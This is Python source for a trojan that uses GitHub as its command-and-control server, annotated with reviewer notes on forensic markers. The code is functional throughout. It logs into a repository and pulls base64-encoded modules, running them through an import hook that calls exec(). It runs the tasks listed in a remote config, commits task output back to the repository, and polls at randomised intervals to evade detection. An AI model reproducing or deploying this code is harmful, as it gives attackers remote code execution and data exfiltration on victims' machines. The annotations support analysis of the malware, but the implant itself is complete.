import json
import base64
import sys
import time
import types
import random
import threading
import queue
from github3 import login
# Identifier baked into this instance; it selects the config file and the
# result directory inside the shared repository.
trojan_id = "abc"

# Repository-relative path of the JSON task list read by get_trojan_config().
trojan_config = f"config/{trojan_id}.json"

# Result directory prefix. store_module_result() builds its own "data/..."
# path and does not read this variable in the code visible here.
data_path = f"data/{trojan_id}/"

# Not referenced by any function visible in this file.
trojan_modules = []

# Set to True by get_trojan_config(); until then GitImporter.find_module()
# performs no remote lookups.
configured = False

# In-flight marker: module_runner() puts an item while a task runs, and the
# main loop only fetches a new config when the queue is empty.
task_queue = queue.Queue()
class GitImporter(object):
    """Import hook whose module source comes from the remote repository.

    ``find_module`` asks ``get_file_contents`` for ``modules/<fullname>`` and
    keeps the base64-decoded payload; ``load_module`` then executes that
    payload inside a newly created module object.

    NOTE(review): the downloaded code is executed without any integrity
    check (no signature, pinned hash or allow-list of module names), so
    write access to the repository equals code execution in this process.
    For analysis, the exec() call in ``load_module`` is the point where
    remotely supplied content becomes running code.
    """

    def __init__(self):
        # Most recently fetched source, held until load_module() executes it.
        self.current_module_code = ""

    def find_module(self, fullname, path=None):
        """Return this importer when remote code for *fullname* exists, else None."""
        # No remote lookups happen before get_trojan_config() has flipped
        # the module-level ``configured`` flag.
        if not configured:
            return None

        print("[*] Attempting to retrieve %s" % fullname)
        fetched = get_file_contents("modules/%s" % fullname)
        if not fetched:
            return None

        self.current_module_code = base64.b64decode(fetched)
        return self

    def load_module(self, name):
        """Execute the previously fetched code as module *name* and register it."""
        loaded = types.ModuleType(name)
        # exec() on data obtained over the network; see the class docstring.
        exec(self.current_module_code, loaded.__dict__)
        sys.modules[name] = loaded
        return loaded
def connect_to_github():
    """Authenticate with github3 and return ``(session, repository, branch)``.

    The account name, password and repository name are literals in this
    function, and the branch is fixed to ``master``. The original author's
    note applies: when the account uses 2FA, pass a personal access token
    instead, i.e. ``login(username="YourUsername", token="YourToken")``.

    NOTE(review): because the credential is stored in clear text in the
    file, anyone who recovers a copy of this script also recovers working
    access to the repository. For incident response that makes the account
    and repository names found here the first things to record and report.
    Every caller in this file invokes this function again, so each fetch or
    upload performs a fresh login.
    """
    session = login(username="YourUsername", password="YourPassword")
    repository = session.repository("YourUsername", "RepositoryName")
    return session, repository, repository.branch("master")
def get_file_contents(filepath):
    """Return the blob content of the first repository path containing *filepath*.

    Walks the recursive tree of the branch's head commit and returns the
    ``content`` attribute of the matching blob, or ``None`` when nothing
    matches. Callers in this file base64-decode the returned value.

    NOTE(review): the comparison is a substring test (``in``), not an exact
    path match, so the first tree entry whose path merely contains
    *filepath* is the one returned.
    """
    _, repo, branch = connect_to_github()
    listing = branch.commit.commit.tree.to_tree().recurse()

    for entry in listing.tree:
        if filepath not in entry.path:
            continue
        print("[*] Found file %s" % filepath)
        return repo.blob(entry._json_data['sha']).content

    return None
def get_trojan_config():
    """Fetch and decode the task list, then import every module it names.

    Reads the file at ``trojan_config`` through ``get_file_contents``,
    base64-decodes it and parses it as JSON. Sets the module-level
    ``configured`` flag, which enables remote lookups in
    ``GitImporter.find_module``. Returns the parsed configuration, which is
    iterated as a sequence of mappings carrying a ``'module'`` key.

    NOTE(review): each ``'module'`` value is taken from the downloaded JSON
    and interpolated into a string that is passed to exec() without being
    checked to be a plain identifier. The config file is therefore a second
    channel, besides the module files, through which repository content
    reaches the interpreter.
    """
    global configured

    encoded = get_file_contents(trojan_config)
    configuration = json.loads(base64.b64decode(encoded))
    configured = True

    for entry in configuration:
        if entry['module'] in sys.modules:
            continue
        # Import is driven through exec() on a formatted string; with the
        # import hook installed this is what triggers the remote fetch.
        exec("import %s" % entry['module'])

    return configuration
def store_module_result(data):
    """Commit *data* (a str) to ``data/<trojan_id>/<random>.data`` in the repository.

    The file name is a random integer between 1000 and 100000 and the commit
    message is the fixed literal ``"Commit message"``. The payload is the
    encoded string as-is; this function applies no encryption or further
    encoding before upload.

    NOTE(review): for repository forensics, the fixed commit message and the
    ``data/<id>/<number>.data`` naming pattern are stable markers of files
    written by this function.
    """
    _, repo, _ = connect_to_github()
    suffix = random.randint(1000, 100000)
    remote_path = "data/%s/%d.data" % (trojan_id, suffix)
    repo.create_file(remote_path, "Commit message", data.encode())
def module_runner(module):
    """Run ``sys.modules[module].run()`` and upload whatever it returns.

    An item is placed on ``task_queue`` for the duration of the ``run()``
    call, which keeps the main loop from fetching a new config while a task
    is in progress. The marker is removed before the upload starts.

    NOTE(review): there is no try/finally around ``run()``; if it raises,
    the marker stays on the queue and the result is never stored.
    """
    task_queue.put(1)
    output = sys.modules[module].run()
    task_queue.get()

    # Push the task's return value to the repository.
    store_module_result(output)
# Main polling loop.
#
# The assignment below replaces the whole of sys.meta_path with a single
# GitImporter instance rather than appending to it, so every finder that
# was registered before is dropped.
sys.meta_path = [GitImporter()]

while True:
    # A new config is fetched only when no task marker is on the queue.
    if task_queue.empty():
        config = get_trojan_config()
        for task in config:
            # One thread per configured task, started 1-10 seconds apart.
            worker = threading.Thread(
                target=module_runner,
                args=(task['module'],),
            )
            worker.start()
            time.sleep(random.randint(1, 10))

    # Poll interval is randomised between 1000 and 10000 seconds, so there
    # is no fixed period to key on; the destination (GitHub API) and the
    # process making the requests are the more stable observables.
    time.sleep(random.randint(1000, 10000))